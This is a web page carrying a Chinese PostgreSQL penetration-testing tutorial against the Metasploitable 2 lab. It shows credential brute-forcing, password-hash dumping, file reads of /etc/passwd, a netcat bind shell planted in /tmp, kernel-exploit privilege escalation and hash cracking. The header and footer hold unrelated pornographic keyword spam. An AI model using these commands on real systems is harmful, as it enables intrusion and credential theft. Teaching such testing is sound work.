成人免费xxxxx在线视频软件_久久精品久久久_亚洲国产精品久久久_天天色天天色_亚洲人成一区_欧美一级欧美三级在线观看

PostgreSQL滲透測試指南

數據庫 其他數據庫 PostgreSQL
我之所以寫這篇文章,目的在于為滲透測試人員提供測試PostgreSQL數據庫的具體方法。文章中用來演示的目標系統是Metasploitable 2,因為該系統包含許多漏洞,也存在配置不當問題。

[[197862]]

一、前言

PostgreSQL是一個開源數據庫,主要部署于Linux操作系統中。然而,PostgreSQL的兼容性非常好,可以兼容多個操作系統,也能在Windows及MacOS操作系統上運行。如果PostgreSQL數據庫沒有被正確配置,并且攻擊者已經事先獲取了憑證信息,那么他們就可以實施各類攻擊行為,比如讀寫系統文件以及執行任意代碼等。

我之所以寫這篇文章,目的在于為滲透測試人員提供測試PostgreSQL數據庫的具體方法。文章中用來演示的目標系統是Metasploitable 2,因為該系統包含許多漏洞,也存在配置不當問題。

二、服務探測及版本識別

PostgreSQL數據庫的默認監聽端口為5432。在端口掃描過程中,如果發現該端口開放,那么目標主機很有可能安裝了PostgreSQL。

  1. nmap -sV 192.168.100.11 -p 5432 

 

圖1. PostgreSQL:通過Nmap判斷數據庫版本

此外,Metasploit平臺中也有一個模塊可以用來識別PostgreSQL數據庫以及具體的版本:

auxiliary/scanner/postgres/postgres_version

 

圖2. PostgreSQL:通過Metasploit識別數據庫版本

三、探測數據庫憑證

在共享文件夾中發現包含數據庫用戶名及密碼的配置文件并不稀奇,然而,如果目標沒有犯下如此低級的失誤,那么我們可以使用一個Metasploit模塊暴力破解數據庫憑證,如下圖所示:

  1. auxiliary/scanner/postgres/postgres_login 

 

圖3. PostgreSQL:暴力破解數據庫憑證

探測數據庫憑證是非常關鍵的一個步驟,如果沒有掌握正確的憑證,我們很難突破目標主機,因為大多數攻擊操作都需要訪問數據庫。

四、訪問數據庫

Kali Linux系統中默認包含了psql工具,在已知數據庫用戶名及密碼的前提下,我們可以使用這個工具通過PostgreSQL數據的認證過程。命令如下:

  1. psql -h 192.168.100.11 -U postgres 

 

圖4. PostgreSQL:訪問數據庫

一旦連接上數據庫,我們應該執行如下操作:

1、枚舉已有的數據庫。

2、枚舉數據庫用戶。

3、枚舉數據庫表。

4、讀取表內容。

5、讀取數據庫密碼。

6、導出數據庫內容。

我們可以使用如下命令完成上述任務:

  1. postgres-# \l 
  2.  
  3. postgres-# \du 
  4.  
  5. template1=# \dt 
  6.  
  7. template1=# SELECT * FROM users; 
  8.  
  9. postgres-# SELECT usename, passwd FROM pg_shadow; 
  10.  
  11. pg_dump --host=192.168.100.11 --username=postgres --password --dbname=template1 --table='users' -f output_pgdump 

 

圖5. PostgreSQL:枚舉已有的數據庫

 

圖6. PostgreSQL:枚舉數據庫用戶

 

圖7. PostgreSQL:枚舉已有表

 

圖8. PostgreSQL:讀取表內容

 

圖9. PostgreSQL:讀取數據庫密碼

 

圖10. PostgreSQL:導出數據庫內容

我們也可以使用Metasploit完成上述部分任務。命令如下:

  1. auxiliary/admin/postgres/postgres_sql 
  2.  
  3. auxiliary/scanner/postgres/postgres_hashdump  

 

圖11. PostgreSQL:使用Metasploit枚舉數據庫 

 

圖12. 使用Metasploit讀取Postgres服務器哈希

 

圖13. 使用Metasploit執行PostgreSQL命令

五、命令執行

PostgreSQL數據庫能夠與底層系統交互,這樣數據庫管理員就能執行各種數據庫命令,同時也能從系統中讀取輸出結果。

  1. postgres=# select pg_ls_dir('./'); 

 

圖14. PostgreSQL:讀取系統目錄結構

執行如下命令,我們就能讀取服務端的postgres文件。

  1. postgres=# select pg_read_file('PG_VERSION', 0, 200); 

 

圖15. PostgreSQL:讀取服務端文件

我們也可以創建一個數據表,以便存儲及查看目標主機中已有的某個文件。命令如下:

  1. postgres-# CREATE TABLE temp(t TEXT); 
  2.  
  3. postgres-# COPY temp FROM '/etc/passwd'
  4.  
  5. postgres-# SELECT * FROM temp limit 1 offset 0;  

 

圖16. PostgreSQL:讀取本地文件

Metasploit框架中有個模塊,可以自動化讀取本地文件,命令如下:

  1. auxiliary/admin/postgres/postgres_readfile 

 

圖17. PostgreSQL:通過Metasploit讀取本地文件

除了讀取文件內容外,我們也可以使用PostgreSQL往目標主機中寫入文件,比如我們可以寫入bash文件,用來監聽某個隨機端口:

  1. postgres=# CREATE TABLE pentestlab (t TEXT); 
  2.  
  3. postgres=# INSERT INTO pentestlab(t) VALUES('nc -lvvp 2346 -e /bin/bash'); 
  4.  
  5. postgres=# SELECT * FROM pentestlab; 
  6.  
  7. postgres=# COPY pentestlab(t) TO '/tmp/pentestlab' 

 

圖18. PostgreSQL:將文件寫入目標主機

當然我們需要賦予該文件可執行權限:

  1. chmod +x pentestlab 
  2.  
  3. ./pentestlab 

 

圖19. 啟動本地監聽器

使用Netcat成功建立連接:

  1. nc -vn 192.168.100.11 2346 
  2.  
  3. python -c "import pty;pty.spawn('/bin/bash')" 

 

圖20. PostgreSQL:連接到后門

如果postgres服務賬戶具備/tmp目錄的寫入權限,那么我們可以通過用戶自定義函數(UDF,user defined functions)實現任意代碼執行。

  1. exploit/linux/postgres/postgres_payload 

 

圖21. PostgreSQL:代碼執行

六、權限提升

如果我們通過已獲取的數據庫憑證或其他方法獲得對目標主機的訪問權限,那么接下來我們應當嘗試將已有權限提升至root權限。當然,我們在Linux系統中可以有各種方法實現權限提升,并且這也是比較復雜的一個過程,但為了不偏離本文的主題,我們使用某個內核漏洞完成權限提升任務。

盡可能完整地獲取內核版本以及操作系統的全部信息有助于我們發現系統存在哪些漏洞,命令如下:

  1. user@metasploitable:/# uname -a 
  2.  
  3. uname -a 
  4.  
  5. Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux  

根據上述內核版本信息,我們可以在exploitdb中搜索對應版本是否存在本地漏洞利用代碼,這也是目前最為簡單的一種方法。

 

圖22. 搜索Linux內核漏洞利用代碼

我們可以在本地或者遠程系統中編譯這段利用代碼。

 

圖23. 編譯漏洞利用程序并獲取netlink的PID信息

這個漏洞利用程序需要在/tmp目錄中創建一個run文件。當漏洞利用代碼執行時就會運行這個文件,我們可以通過該文件監聽某個端口。

  1. #!/bin/bash 
  2.  
  3. nc -lvvp 2345 -e /bin/bash  

 

圖24. 在tmp目錄中創建run文件

需要賦予該文件可執行權限。

  1. chmod +x /tmp/run 

我們可以通過如下命令,建立與該端口的連接,然后獲得root權限下的python shell接口。

  1. nc -vn 192.168.100.11 2345 
  2.  
  3. python -c "import pty;pty.spawn('/bin/bash')" 

 

圖25. 通過Netcat與目標主機建立連接

我們可以使用Metasploit平臺自動完成上述過程。因此當我們發現目標主機存在某個漏洞時,我們可以嘗試在Metasploit中搜索是否有個匹配的模塊可以使用:

 

圖26. 利用Metasploit實現Linux系統權限提升

當漏洞利用代碼執行時,我們可以得到另一個具備root用戶權限的Meterpreter會話:

 

圖27. root權限下的Meterpreter會話

即使我們已經獲得了root訪問權限,我們最好還是從shadow文件中讀取所有用戶的密碼哈希,以便后續破解這些哈希值。通過這些哈希值,滲透測試人員可以發現存在弱口令的賬戶,也很有可能借助其中某些賬戶訪問同一網絡中的其他系統。

  

圖28. 檢查Shadow文件

我們可以將密碼哈希值保存到一個文本文件中,然后使用John the Ripper工具破解這些哈希:

  1. john /root/Desktop/password.txt 
  2.  
  3. john --show /root/Desktop/password.txt 

 

圖29. 被破解的哈希值

上述命令可以顯示已被成功破解的密碼哈希值。

現在,這個Linux系統中的所有賬戶已被我們破解,我們可以使用這些賬戶訪問其他系統。 

責任編輯:龐桂玉 來源: 計算機與網絡安全
相關推薦

2022-01-17 07:22:11

Web應用滲透

2022-01-18 07:40:27

滲透測試黑客

2020-09-11 11:29:34

滲透測試風險評估網絡安全

2020-09-15 06:15:23

滲透測試風險評估網絡安全

2016-09-09 01:14:17

2013-11-06 16:38:59

2021-07-15 10:46:21

滲透測試網絡安全網絡攻擊

2010-08-03 22:09:16

2013-12-10 09:51:18

2013-12-24 13:15:59

2013-12-30 13:11:03

2014-04-03 09:35:28

2013-05-27 13:37:06

2010-09-09 21:10:22

2013-11-28 10:32:10

2010-09-16 16:08:46

2016-10-10 22:11:02

2010-09-13 11:05:08

2013-11-28 11:29:39

2013-11-28 13:03:17

點贊
收藏

51CTO技術棧公眾號

主站蜘蛛池模板: 少妇性l交大片免费一 | a黄毛片 | 啪啪免费网 | 一区二区免费高清视频 | 国产综合精品一区二区三区 | 91精品国产91久久久久久不卞 | 欧美精品在线免费观看 | 涩涩视频在线播放 | 精品国产一区二区三区性色av | 亚洲首页| 国产精品1区2区 | 亚洲国产精品久久 | 在线观看中文字幕一区二区 | 亚洲精品在线91 | 久久国产婷婷国产香蕉 | 91久久精品 | 国产高清精品一区二区三区 | 国产欧美日韩精品一区 | 嫩草国产 | 精品三级在线观看 | 国产婷婷精品 | 国产日韩欧美精品一区二区 | 日韩精品在线网站 | 精品亚洲一区二区三区 | 成人三级网址 | 久久久久久久一区二区三区 | 91麻豆精品国产91久久久更新资源速度超快 | 久久久久久久电影 | 一区二区av | 狠狠久久 | 一区日韩| 日韩精品一区二区三区免费观看 | 视频一区二区中文字幕 | 综合久久亚洲 | 国产成人99av超碰超爽 | 日日摸日日碰夜夜爽亚洲精品蜜乳 | 成人精品一区二区三区四区 | 日韩精品一区二区三区视频播放 | 欧洲视频一区二区 | 99久久精品国产一区二区三区 | 国产精品久久久久久久久 |